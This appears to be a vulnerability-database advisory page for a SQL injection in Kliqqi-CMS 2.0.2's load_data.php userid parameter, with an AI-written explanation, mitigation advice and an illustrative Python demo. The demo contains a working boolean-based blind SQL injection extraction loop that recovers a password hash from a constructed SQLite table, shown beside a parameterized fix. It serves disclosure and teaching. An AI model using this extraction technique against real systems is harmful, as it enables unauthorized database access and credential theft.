CVE-2024-31673
Description
Kliqqi-CMS 2.0.2 is vulnerable to SQL Injection in load_data.php via the userid parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Kliqqi-CMS 2.0.2 is vulnerable to SQL injection in load_data.php via the userid parameter, enabling database information disclosure.
Vulnerability
Kliqqi-CMS version 2.0.2 contains a SQL injection vulnerability in the /load_data.php script. The userid parameter is concatenated into a database query without validation or escaping, so an attacker controls part of the SQL statement the application executes. The vulnerable request is a POST to /load_data.php carrying the parameters pagesize, pname, start_up, userid, and view; only userid is reported as injectable. The issue is documented in the project's GitHub issue tracker [1].
Exploitation
An attacker can exploit this vulnerability by sending a crafted POST request to /load_data.php with a malicious userid parameter. No authentication is required. The proof-of-concept script in the reference uses boolean-based blind SQL injection: it appends a condition to userid that is true only when a given character of the database name matches a guess, then compares the length of the HTTP response with the length of a known-true baseline response to learn the answer, one character per guess. The same loop works for any value the database user can read, so the payload can be adapted to extract table names, columns, and row contents [1].
Impact
Successful exploitation allows an attacker to extract sensitive information from the database, such as the database name, table names, and potentially user credentials or other application data. The impact is limited to information disclosure; no remote code execution or privilege escalation is indicated in the available references [1].
Mitigation
As of the publication date, no official patch has been released for this vulnerability, and the issue remains open in the project's repository [1]. Until a fix is available, the workaround is to change /load_data.php so that userid is validated as an integer (reject or cast anything that is not a plain number) and is passed to the database through a prepared statement with a bound parameter instead of being concatenated into the query string. Escaping alone is not a substitute for parameterization here, because the value is used in a numeric context where quotes are not needed to break out.
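The extraction technique described under Exploitation and the fix described under Mitigation, as one added example. This is illustrative Python written for this page, not Kliqqi's PHP code or the referenced proof of concept; it models the flawed handler and the corrected one against a constructed in-memory SQLite table (the real target is MySQL, where the PoC reads database(); SQLite has no database name, so the example reads a row value instead, which uses the identical character-by-character loop). The table, column names, and the vulnerable_load_data / hardened_load_data / blind_extract names are assumptions of the example.

```python
import sqlite3

# Constructed stand-in for the application database (not Kliqqi's real schema).
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO users VALUES (1, 'admin', 'a1b2c3');
INSERT INTO users VALUES (2, 'guest', 'd4e5f6');
""")


def render(rows) -> str:
    """Page fragment sent back to the client; its length is the blind oracle."""
    return "".join(f"<li>{username}</li>" for (username,) in rows)


def vulnerable_load_data(userid: str) -> str:
    """Model of the flawed handler: userid is concatenated straight into the SQL."""
    query = "SELECT username FROM users WHERE user_id = " + userid
    return render(DB.execute(query).fetchall())


def hardened_load_data(userid: str) -> str:
    """Corrected handler: validate the type, then bind the value as a parameter."""
    if not userid.isdigit():
        return ""  # anything that is not a plain integer is rejected outright
    rows = DB.execute(
        "SELECT username FROM users WHERE user_id = ?", (int(userid),)
    ).fetchall()
    return render(rows)


def blind_extract(handler, target_expr: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction of a scalar SQL expression.

    One request per candidate character: the injected AND clause is true only
    when the character at `pos` equals the guess, and a true clause reproduces
    the baseline (user 1) response length. A non-match or the end of the value
    yields a shorter response.
    """
    baseline = len(handler("1"))  # known-true request: user_id = 1 exists
    extracted = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):  # printable ASCII guesses
            payload = f"1 AND unicode(substr(({target_expr}),{pos},1))={code}"
            if len(handler(payload)) == baseline:
                found = chr(code)
                break
        if found is None:
            break  # substr past the end returns '', unicode('') is NULL: loop ends
        extracted += found
    return extracted


if __name__ == "__main__":
    secret = "SELECT password_hash FROM users WHERE username='admin'"
    print("vulnerable:", blind_extract(vulnerable_load_data, secret))
    print("hardened:  ", repr(blind_extract(hardened_load_data, secret)))
```

Against the vulnerable handler the loop recovers the admin password hash from the constructed table; against the hardened handler every payload is rejected before it reaches the database, so no response ever matches the baseline and the loop stops at the first position with nothing extracted.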
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Kliqqi-CMS, version = 2.0.2 (no CPE assigned)
Patches
No patches discovered yet.
References
[1] Kliqqi-CMS GitHub issue tracker entry reporting the SQL injection in load_data.php.
News mentions
No linked articles in our index yet.